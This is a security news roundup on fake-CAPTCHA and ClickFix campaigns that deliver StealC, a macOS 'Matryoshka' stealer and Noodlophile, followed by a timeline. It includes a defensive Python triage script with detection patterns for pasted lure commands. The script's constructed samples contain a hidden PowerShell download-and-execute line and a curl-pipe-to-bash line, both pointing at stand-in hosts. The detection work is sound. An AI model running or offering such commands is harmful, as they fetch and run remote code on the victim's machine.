Fake CAPTCHA and ClickFix Social Engineering Used to Deliver Stealer Malware
A wave of social-engineering-driven malware delivery is abusing “verification” and “fix” workflows to trick users into running attacker-supplied commands that install information stealers. LevelBlue reported a campaign using fake Cloudflare-style CAPTCHA pages on compromised websites to convince Windows users to manually execute malicious PowerShell commands, resulting in StealC deployment; StealC is described as exfiltrating browser credentials, crypto wallet data, Steam and Outlook credentials, system information, and screenshots over RC4-encrypted HTTP to a C2 server. Intego also identified an evolved ClickFix technique on macOS (“Matryoshka”) that leverages typosquatting to redirect users to pages instructing them to paste “fix” commands into Terminal; the loader then retrieves an AppleScript payload to steal browser credentials and target wallet apps (e.g., Trezor Suite, Ledger Live), including repeated fake password prompts as a fallback.
Separately, other credential-theft campaigns are also leaning heavily on lures that exploit user trust and routine workflows. Morphisec described Noodlophile evolving from fake AI video platform ads to fake job postings and phishing “assessments,” delivering multi-stage stealers/RATs via techniques including DLL sideloading, while continuing to use Telegram bots for exfiltration/C2 and adding file-bloating content intended to disrupt automated analysis. These developments reinforce that user-in-the-loop execution (copy/paste commands, “verification” steps, and recruitment-themed forms) remains a high-yield initial access vector for stealers across both Windows and macOS environments.
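The common thread in both campaigns is a command the victim is told to paste (into the Windows Run dialog or into macOS Terminal). As an added defensive example that is not from the original report or from Mallory, the Python below triages such commands, whether recovered from the Windows Run dialog history (the RunMRU registry key, where Explorer stores each entry with a trailing `\1`) or from a shell history; the indicator patterns and all sample entries are constructed assumptions for illustration, not indicators from the campaigns described above.

```python
import re

# Heuristics for the kind of command a ClickFix lure asks the victim to paste
# (Windows Run dialog or macOS Terminal). The pattern list is this example's
# own assumption about commonly reported traits, not IoCs from the campaigns.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring|curl|wget)\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:bash|sh|zsh|iex|invoke-expression)\b", re.I),
    "script_host": re.compile(r"\b(?:mshta|osascript|base64\s+(?:-d|-D|--decode))\b", re.I),
    "verification_lure": re.compile(r"not a robot|verification|captcha|cloudflare", re.I),
}

def score_command(cmd: str) -> list[str]:
    """Names of the indicators matched by one pasted command string."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def parse_runmru(values: dict[str, str]) -> list[str]:
    """Order exported RunMRU values (most recent first, per MRUList) and strip
    the trailing '\\1' that Explorer appends to each entry."""
    cmds = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds

def triage(cmds: list[str], threshold: int = 2) -> list[tuple[str, list[str]]]:
    """Entries matching at least `threshold` indicators, with what matched."""
    scored = [(c, score_command(c)) for c in cmds]
    return [(c, m) for c, m in scored if len(m) >= threshold]

# Constructed samples (not captured data): a RunMRU export with two benign
# entries and one ClickFix-style entry, plus two macOS shell history lines.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "mmc\\1",
    "c": 'powershell -w hidden -c "iex (iwr http://lure.example.invalid/v)" '
         "# I am not a robot - Verification ID 7\\1",
}
SAMPLE_TERMINAL = ["ls -la ~/Downloads",
                   "curl -fsSL https://fix.example.invalid/f | bash"]

if __name__ == "__main__":
    for cmd, matched in triage(parse_runmru(SAMPLE_RUNMRU)) + triage(SAMPLE_TERMINAL):
        print(f"SUSPICIOUS [{', '.join(matched)}]: {cmd}")
```

The two-indicator threshold keeps a lone `curl` or a benign mention of "verification" from alerting; tune it against your own RunMRU and shell-history baselines.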

How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
Matryoshka ClickFix variant targets macOS users with stealer malware
Researchers described an evolved ClickFix technique dubbed Matryoshka that used typosquatting domains and nested obfuscation to trick macOS users into pasting a fake fix command into Terminal. The attack executed largely in memory, then retrieved an AppleScript payload to steal browser credentials and target cryptocurrency wallet applications such as Trezor Suite and Ledger Live.
ClickFix campaign uses fake CAPTCHA pages to deliver StealC on Windows
A social engineering campaign was observed using fake Cloudflare-style CAPTCHA pages on compromised legitimate websites to trick Windows users into pasting and running malicious PowerShell from the Run dialog. The fileless chain fetched in-memory shellcode and a downloader that ultimately injected StealC into svchost.exe for credential, wallet, and system data theft.
Researchers document anti-analysis upgrades in newer Noodlophile samples
Analysts reported that newer Noodlophile samples added retaliatory anti-analysis padding aimed at crashing AI-based analysis pipelines, along with djb2-based dynamic API resolution, tamper checks, RC4-encrypted command files, and XOR-encoded strings. Telegram remained central to command-and-control and exfiltration.
Noodlophile campaign shifts to fake job postings and phishing lures
By February 2026, the Noodlophile operators had evolved their delivery tactics to use remote-work themed social engineering, including fake job postings, application forms, and skill tests. The campaign delivered multi-stage stealers and RATs, including via DLL sideloading, and was linked to the Vietnamese group UNC6229.
Noodlophile stealer first reported in social media ad campaign
The Noodlophile information-stealer was first reported in May 2025, when it was being distributed through fake AI video generator ads on social media. The malware stole credentials and cryptocurrency wallet data and used Telegram bots for exfiltration.
Sources
Fake CAPTCHA Scam Tricks Windows Users Into Installing Malware
techrepublic.com
Noodlophile Malware Creators Evolve Tactics with Fake Job Postings and Phishing Lures
cybersecuritynews.com
New Clickfix variant 'Matryoshka' Attacking Users to Deploy macOS Stealer Malware
cybersecuritynews.com